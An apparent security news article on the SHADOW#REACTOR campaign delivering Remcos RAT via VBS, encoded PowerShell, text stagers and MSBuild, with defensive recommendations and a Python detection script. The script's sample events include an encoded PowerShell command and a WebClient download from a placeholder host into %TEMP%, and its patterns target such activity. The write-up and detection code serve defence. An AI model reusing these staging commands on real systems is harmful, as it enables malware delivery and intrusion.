Malware | January 17, 2026 | 3 min read

SHADOW#REACTOR Campaign Drops Remcos RAT via MSBuild

Multi-stage malware campaign uses text-based stagers and living-off-the-land binaries to deliver Remcos RAT to enterprise targets.

James Rivera

Securonix researchers have exposed a multi-stage malware campaign dubbed SHADOW#REACTOR that delivers Remcos RAT through an unusually evasive infection chain. The campaign targets enterprise and small-to-medium business environments, with tooling that suggests initial access broker involvement.

What sets this operation apart is its reliance on intermediate text-only stagers and in-memory PowerShell reconstruction—a combination designed to slip past endpoint detection tools that key on binary payloads.

How the Attack Unfolds

The infection begins with an obfuscated Visual Basic Script named "win64.vbs" that likely arrives via phishing or social engineering. When executed through wscript.exe, it deploys a Base64-encoded PowerShell payload.

The PowerShell script then reaches out to attacker infrastructure using System.Net.WebClient, downloading a text-based payload—"qpwoe64.txt" for 64-bit systems or "qpwoe32.txt" for 32-bit—into the %TEMP% directory. The stager validates file existence and size before proceeding, implementing a self-healing mechanism that retries downloads if the file doesn't meet expected thresholds.

Upon validation, a secondary PowerShell script ("jdywa.ps1") is constructed in the temp directory. This script invokes a .NET Reactor-protected assembly that establishes persistence and incorporates anti-debugging and anti-VM checks.

The final stage abuses MSBuild.exe—a legitimate Windows binary—to execute the Remcos RAT payload. This living-off-the-land technique allows the malware to run under a trusted Microsoft process, complicating detection.

Why Text-Based Stagers Matter

Traditional malware drops binary executables that security tools can scan and flag. SHADOW#REACTOR's text-only intermediate payloads are reconstructed in memory, meaning they never touch disk in their final form. This approach mirrors techniques we've seen in supply chain attacks targeting developer tools, where attackers increasingly prefer fileless execution.

The .NET Reactor protection on the loader adds another obstacle—this commercial obfuscation tool is legitimate software, making the protected assembly harder to analyze and flag as malicious.

Attribution and Intent

Securonix assesses this as a broad, opportunistic campaign rather than targeted espionage. The tooling and tradecraft align with typical initial access brokers: threat actors who obtain footholds in target environments and sell that access to ransomware groups or other buyers.

This fits a pattern we've tracked extensively in our ransomware group profiles. Access brokers have become the supply chain feeding ransomware operations, and campaigns like SHADOW#REACTOR represent the upstream collection activity.

Defensive Recommendations

  1. Monitor PowerShell activity - Flag Base64-encoded commands and suspicious WebClient downloads to temp directories
  2. Watch MSBuild.exe - This binary rarely runs outside development environments; unexpected execution warrants investigation
  3. Block or monitor VBS execution - Most enterprises don't need users running .vbs files from email attachments
  4. Implement application allowlisting - Prevent unauthorized scripts from executing in user contexts
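The four recommendations above, turned into simple detection logic over process-creation telemetry. This is an added example written for this article, not code from Securonix; the events are constructed, Sysmon-style samples (parent image, image, command line) that mimic the chain described, and the rule names, thresholds and path patterns are the author's assumptions.

```python
import re

# Constructed, hypothetical process-creation events (not telemetry from the report).
SAMPLE_EVENTS = [
    {"parent": "outlook.exe", "image": "wscript.exe",
     "cmd": r'wscript.exe "C:\Users\alice\Downloads\win64.vbs"'},
    {"parent": "wscript.exe", "image": "powershell.exe",
     "cmd": "powershell.exe -w hidden -enc QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVo="},
    {"parent": "powershell.exe", "image": "powershell.exe",
     "cmd": r"powershell.exe (New-Object System.Net.WebClient).DownloadFile("
            r"'http://PLACEHOLDER/qpwoe64.txt','C:\Users\alice\AppData\Local\Temp\qpwoe64.txt')"},
    {"parent": "powershell.exe", "image": "MSBuild.exe",
     "cmd": r"MSBuild.exe C:\Users\alice\AppData\Local\Temp\stage.xml"},
    {"parent": "devenv.exe", "image": "MSBuild.exe",           # benign developer build
     "cmd": r"MSBuild.exe C:\src\app\app.csproj"},
]

# User-writable locations where staged payloads and stagers are typically written.
USER_WRITABLE = re.compile(r"\\(Downloads|AppData\\Local\\Temp|Temp)\\", re.I)
# PowerShell -e/-ec/-enc/-EncodedCommand followed by a Base64 blob of 20+ chars.
ENCODED_FLAG = re.compile(r"\s-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I)
WEBCLIENT = re.compile(r"System\.Net\.WebClient|DownloadFile|DownloadString", re.I)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Parents under which MSBuild.exe is expected (assumed dev-tool allowlist; tune per environment).
DEV_PARENTS = {"devenv.exe", "dotnet.exe", "msbuild.exe"}


def classify(event):
    """Return the names of the detection rules a single event matches (empty if benign)."""
    image, parent, cmd = event["image"].lower(), event["parent"].lower(), event["cmd"]
    hits = []
    if image in SCRIPT_HOSTS and re.search(r"\.vbs\b", cmd, re.I) and USER_WRITABLE.search(cmd):
        hits.append("vbs_from_user_dir")            # rec. 3: .vbs run from Downloads/Temp
    if image == "powershell.exe":
        if ENCODED_FLAG.search(cmd):
            hits.append("encoded_powershell")        # rec. 1: Base64-encoded command
        if parent in SCRIPT_HOSTS:
            hits.append("script_host_spawned_powershell")
        if WEBCLIENT.search(cmd) and USER_WRITABLE.search(cmd):
            hits.append("webclient_download_to_temp")  # rec. 1: WebClient fetch into %TEMP%
    if image == "msbuild.exe" and (parent not in DEV_PARENTS or USER_WRITABLE.search(cmd)):
        hits.append("msbuild_outside_dev_context")   # rec. 2: MSBuild without a build tool parent
    return hits


def scan(events):
    """Return (index, rule_hits) for every event that triggers at least one rule."""
    return [(i, h) for i, e in enumerate(events) if (h := classify(e))]
```

Rule 4 (allowlisting) is enforced by policy rather than detected here; this scan is the complementary telemetry check, so a build server with a different parent process would need DEV_PARENTS adjusted.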

Organizations should also review their malware defense fundamentals, particularly around fileless attack detection. Traditional antivirus alone won't catch these staged payloads.

Why This Matters

SHADOW#REACTOR demonstrates how commodity malware delivery has evolved. The combination of legitimate tools (MSBuild), commercial obfuscation (.NET Reactor), and text-based staging creates an infection chain that's harder to detect than dropping a PE file.

For security teams already stretched thin, this means yet another detection gap to close—one that requires behavioral monitoring rather than signature-based scanning.
